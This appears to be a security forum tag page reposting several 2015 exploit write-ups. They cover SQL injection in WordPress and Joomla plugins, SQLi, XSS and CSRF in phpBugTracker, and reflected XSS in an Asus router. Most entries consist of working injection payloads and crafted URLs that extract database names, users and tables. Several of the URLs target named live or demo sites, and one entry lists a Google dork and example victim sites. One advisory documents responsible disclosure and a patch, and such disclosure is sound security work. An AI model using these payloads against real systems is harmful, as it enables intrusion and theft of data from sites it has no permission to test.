Search the Community
Showing results for tags 'parameter'.
-
################################################################################################## #Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability #Author : Jagriti Sahu AKA Incredible #Vendor Link : https://www.wpbusinessintelligence.com #Download Link : https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip #Date : 1/04/2015 #Discovered at : IndiShell Lab #Love to : error1046 ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ################################################################################################## //////////////////////// /// Overview: //////////////////////// Wordpress plugin "Business Intelligence" is not filtering data in GET parameter ' t ', which in is file 'view.php' and passing user supplied data to SQL queries' hence SQL injection vulnerability has taken place. /////////////////////////////// // Vulnerability Description: / /////////////////////////////// vulnerability is due to parameter " t " in file 'view.php'. user can inject sql query uning GET parameter 't' //////////////// /// POC //// /////////////// POC Image URL---> ================= Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting SQL Injection in parameter 't' (file 'view.php'): ================================================= Injectable Link---> http://www.wpbusinessintelligence.com/wp-content/plugins/wp-business-intelligence/view.php?t=1 Union based SQL injection exist in the parameter which can be exploited as follows: Payload used in Exploitation for Database name ---> http://www.wpbusinessintelligence.com/wp-content/plugins/wp-business-intelligence/view.php ?t=1337+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+ ################################################################################################### --==[[special Thanks to]]==-- # Manish Kishan Tanwar # Source: http://packetstorm.wowhacker.com/1504-exploits/wpbusinessintelligence-sql.txt
-
###################################################################### # Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability # Google Dork: inurl:option=com_gallery_wd # Date: 29.03.2015 # Exploit Author: CrashBandicot (@DosPerl) # Vendor HomePage: http://web-dorado.com/ # Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd # Tested on: Windows ###################################################################### parameter 'theme_id' in GET vulnerable # Example : # Parameter: theme_id (GET) # Type: error-based # GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # ==================================================================================== # parameter 'image_id' in POST vulnerable # Example : # URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2 # Parameter: image_id (POST) # Type: error-based # POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search # ~ Demo ~ # $> http://www.cnct.tg/ http://www.nswiop.nsw.edu.au/ http://cnmect.licee.edu.ro/ #EOF Source
-
- error-based
- parameter
-
(and 3 more)
Tagged with:
-
###################################################################### # Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability # Google Dork: inurl:option=com_gallery_wd # Date: 29.03.2015 # Exploit Author: CrashBandicot (@DosPerl) # Vendor HomePage: http://web-dorado.com/ # Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd # Tested on: Windows ###################################################################### parameter 'theme_id' in GET vulnerable # Example : # Parameter: theme_id (GET) # Type: error-based # GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # ==================================================================================== # parameter 'image_id' in POST vulnerable # Example : # URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2 # Parameter: image_id (POST) # Type: error-based # POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search #EOF Source
-
- error-based
- parameter
-
(and 3 more)
Tagged with:
-
################################################################################################## #Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability #Author : Jagriti Sahu AKA Incredible #Vendor Link : Joomla Random Article Demo-Web Dorado #Date : 22/03/2015 #Discovered at : IndiShell Lab #Love to : error1046 ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ################################################################################################## //////////////////////// /// Overview: //////////////////////// joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters and hence affected by SQL injection vulnerability /////////////////////////////// // Vulnerability Description: /////////////////////////////// vulnerability is due to catID and Itemid parameter //////////////// /// POC //// /////////////// SQL Injection in catID parameter ================================= Use error based double query injection with catID parameter Injected Link---> Joomla Form Maker Demo-Web-Dorado Like error based double query injection for exploiting username ---> Error: 500 View not found [name, type, prefix]: randomarticle, html, randomarticleView' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13 POC Image URL---> Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting SQL Injection in Itemid parameter ================================= Itemid Parameter is exploitable using xpath injection Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '***%' OR items='all'' at line 1 SQL=SELECT * FROM vmvxw_spiderfacebook_params WHERE items LIKE '%***13' extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- - POC Image URL---> http://tinypic.com/view.php?pic=1239z5h&s=8#.VRG97OESHIU ################################################################################################### --==[[special Thanks to]]==-- # Manish Kishan Tanwar # Source: http://dl.packetstormsecurity.net/1503-exploits/joomlasrac-sql.txt
-
################################################################################################## #Exploit Title : Joomla Spider FAQ component SQL Injection vulnerability #Author : Manish Kishan Tanwar AKA error1046 #Vendor Link : http://demo.web-dorado.com/spider-faq.html #Date : 21/03/2015 #Discovered at : IndiShell Lab #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi #Discovered At : Indishell Lab ################################################################################################## //////////////////////// /// Overview: //////////////////////// joomla component Spider FAQ is not filtering data in theme and Itemid parameters and hence affected from SQL injection vulnerability /////////////////////////////// // Vulnerability Description: /////////////////////////////// vulnerability is due to theme and Itemid parameter //////////////// /// POC //// /////////////// POC image=http://oi57.tinypic.com/2rh1zk7.jpg SQL Injection in theme parameter ================================= Use error based double query injection with theme parameter Like error based double query injection for exploiting username ---> and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- - Injected Link---> http://website.com/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4 and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- - &searchform=1&expand=0&Itemid=109 SQL Injection in Itemid parameter ================================= Itemid Parameter is exploitable using xpath injection User extraction payload ------------------------ ' AND EXTRACTVALUE(6678,CONCAT(0x7e,(SELECT user() LIMIT 0,1),0x7e))-- - crafted URL---> http://demo.web-dorado.com/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4&searchform=1&expand=0&Itemid=109' AND EXTRACTVALUE(6678,CONCAT(0x7e,(SELECT user() LIMIT 0,1),0x7e))-- - Table extraction ----------------- ' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e))-- - Crafted URL----> http://demo.web-dorado.com/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4&searchform=1&expand=0&Itemid=109' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e))-- - --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash ############################################################################################# --==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3 Source
-
- information_schema.tables
- injection
-
(and 3 more)
Tagged with:
-
Advisory: Multiple SQLi, stored/reflecting XSS- and CSRF-vulnerabilities in phpBugTracker v.1.6.0 Advisory ID: SROEADV-2015-16 Author: Steffen Rösemann Affected Software: phpBugTracker v.1.6.0 Vendor URL: https://github.com/a-v-k/phpBugTracker Vendor Status: patched CVE-ID: will asked to be assigned after release on FullDisclosure via OSS-list Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31 ========================== Vulnerability Description: ========================== The Issuetracker phpBugTracker v. 1.6.0 suffers from multiple SQLi-, stored/reflected XSS- and CSRF-vulnerabilities. ================== Technical Details: ================== The following files used in a common phpBugTracker installation suffer from different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities: =========== project.php =========== SQL injection / underlaying CSRF vulnerability in project.php via id parameter: http:// {TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+ Stored XSS via input field "project name": http://{TARGET}/admin/project.php?op=add executed in: e.g. http://{TARGET}/admin/project.php, http:// {TARGET}/index.php ======== user.php ======== Reflecting XSS in user.php via use_js parameter: http:// {TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1 executed in: same page ========= group.php ========= Reflecting XSS in group.php via use_js parameter: http:// {TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1 executed in: same page (Blind) SQL Injection / underlaying CSRF vulnerability in group.php via group_id parameter (used in different operations): http:// {TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+ http:// {TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+ ========== status.php ========== SQL injection / underlaying CSRF vulnerability in status.php via status_id parameter: http:// {TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+ Stored XSS via input field "Description": http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0 executed in: e.g. http://{TARGET}/admin/status.php CSRF vulnerability in status.php (delete statuses): <img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}" ============== resolution.php ============== SQL injection / underlaying CSRF vulnerability in resolution.php via resolution_id parameter: http:// {TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+ CSRF vulnerability in resolution.php (delete resolutions): <img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}" ============ severity.php ============ SQL injection / underlaying CSRF vulnerability in severity.php via severity_id parameter: http:// {TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+ CSRF vulnerability in severity.php (delete severities): <img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}" Stored XSS in severity.php via input field "Description": http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0 executed in: e.g. http://{TARGET}/admin/severity.php ============ priority.php ============ SQL injection / underlaying CSRF vulnerability in priority.php via priority_id parameter: http:// {TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+ ====== os.php ====== SQL Injection / underlaying CSRF vulnerability in os.php via os_id parameter: http:// {TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+ CSRF vulnerability in os.php (delete operating systems): <img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" > Stored XSS vulnerability in os.php via input field "Regex": http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0 executed in: e.g. http://{TARGET}/admin/os.php? ============ database.php ============ SQL injection / underlaying CSRF vulnerability in database.php via database_id: http:// {TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+ CSRF vulnerability in database.php (delete databases): <img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}" Stored XSS vulnerability in database.php via input field "Name": http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0 ======== site.php ======== CSRF vulnerability in site.php (delete sites): <img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" > SQL injection / underlaying CSRF vulnerability in site.php via site_id parameter: http:// {TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+ ======= bug.php ======= This issue has already been assigned CVE-2004-1519, but seems to have not been corrected since the assignment: SQL injection / underlaying CSRF vulnerability in bug.php via project parameter: http:// {TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+ For details see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519. ========= Solution: ========= Update to version 1.7.0. ==================== Disclosure Timeline: ==================== 03/05-Feb-2015 – found the vulnerabilities 05-Feb-2015 - informed the developers (see [3]) 05-Feb-2015 – release date of this security advisory [without technical details] 05-Feb-2015 - forked the Github repository, to keep it available for other security researchers (see [4]) 05/06-Feb-2015 - vendor replied, will provide a patch for the vulnerabilities 09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical details will be released on 19th February 2015 19-Feb-2015 - release date of this security advisory 19-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerabilities found and advisory written by Steffen Rösemann. =========== References: =========== [1] https://github.com/a-v-k/phpBugTracker [2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html [3] https://github.com/a-v-k/phpBugTracker/issues/4 [4] https://github.com/sroesemann/phpBugTracker Source
-
##################################### Title:- Reflected XSS vulnarbility in Asus RT-N10 Plus router Author: Kaustubh G. Padwad Product: ASUS Router RT-N10 Plus Firmware: 2.1.1.1.70 Severity: Medium Auth: Requierd # Description: Vulnerable Parameter: flag= # Vulnerability Class: Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) # About Vulnerability: Asus Router RT-N10 Plus with firmware 2.1.1.70 is vulnarable for crosss site scripting attack,this may cause a huge network compemise. #Technical Details: The value of the flag request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload initial78846%27%3balert("Hacked_BY_S3curity_B3ast")%2f%2f372137b5d was submitted in the flag parameter. This input was echoed unmodified in the application's response. #Steps to Reproduce: (POC): After setting up router Enter this URL 1.http://ip-of-router/result_of_get_changed_status.asp?current_page=&sid_list=LANGUAGE%3B&action_mode=+App ly+&preferred_lang=&flag=initial78846%27%3balert(1337)%2f%2f372137b5d 2. this will ask for creadintial once creatintial enterd it will be successfull XSS # Disclosure: 8-jan-2015 Repoerted to ASUS 9-jan-2015 Asus confirm that they reported to concern department 15-jan-2015 Ask for update from asus asus says reported to HQ 28-jan-2015 Ask asus about reporting security foucus No reply from ASUS 29-jan-2015 security focus bugtraq #credits: Kaustubh Padwad Information Security Researcher kingkaustubh@me.com https://twitter.com/s3curityb3ast http://breakthesec.com https://www.linkedin.com/in/kaustubhpadwad Source